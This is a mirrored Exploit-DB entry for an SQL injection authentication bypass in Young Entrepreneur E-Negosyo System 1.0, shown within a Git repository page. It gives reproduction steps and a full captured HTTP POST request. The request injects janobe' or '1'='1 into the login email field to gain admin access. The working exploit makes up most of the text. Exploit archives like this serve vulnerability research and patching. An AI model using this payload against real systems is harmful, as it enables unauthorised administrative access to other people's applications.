bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/50374.txt
Offensive Security 7cf828b365 DB: 2021-10-05 
5 changes to exploits/shellcodes

Payara Micro Community 5.2021.6 - Directory Traversal
Lodging Reservation Management System 1.0 - SQL Injection / Authentication Bypass
Open Game Panel - Remote Code Execution (RCE) (Authenticated)
Young Entrepreneur E-Negosyo System 1.0 - SQL Injection Authentication Bypass
Young Entrepreneur E-Negosyo System 1.0 - 'PRODESC' Stored Cross-Site Scripting (XSS)
2021-10-05 05:02:09 +00:00

36 lines
No EOL
1.5 KiB
Text
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# Exploit Title: Young Entrepreneur E-Negosyo System 1.0 - SQL Injection Authentication Bypass
# Date: 2021-10-02
# Exploit Author: Jordan Glover
# Vendor Homepage: https://www.sourcecodester.com/php/12684/young-entrepreneur-e-negosyo-system.html
# Software Link: https://www.sourcecodester.com/download-code?nid=12684&title=Young+Entrepreneur+E-Negosyo+System+in+PHP+Free+Source+Code
# Version: v1.0
# Tested on: Windows 10 + XAMPP v3.3.0
Steps-To-Reproduce:
Step 1 Go to the admin panel http://localhost/bsenordering/admin/login.php
Step 2 Enter the default admin username janobe and enter password test
Step 3 Click on Sign in and capture the request in the Burp Suite
Step 4 Change the user_email to janobe' or '1'='1
Step 5 Click forward and now you will be logged in as an admin.
POC
POST /bsenordering/admin/login.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 40
Origin: http://localhost
Connection: close
Referer: http://localhost/bsenordering/admin/login.php
Cookie: PHPSESSID=him428198e798r23eagi9mapjk
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
user_email=janobe' or '1'='1&user_pass=test&btnLogin=
Reference in a new issue View git blame Copy permalink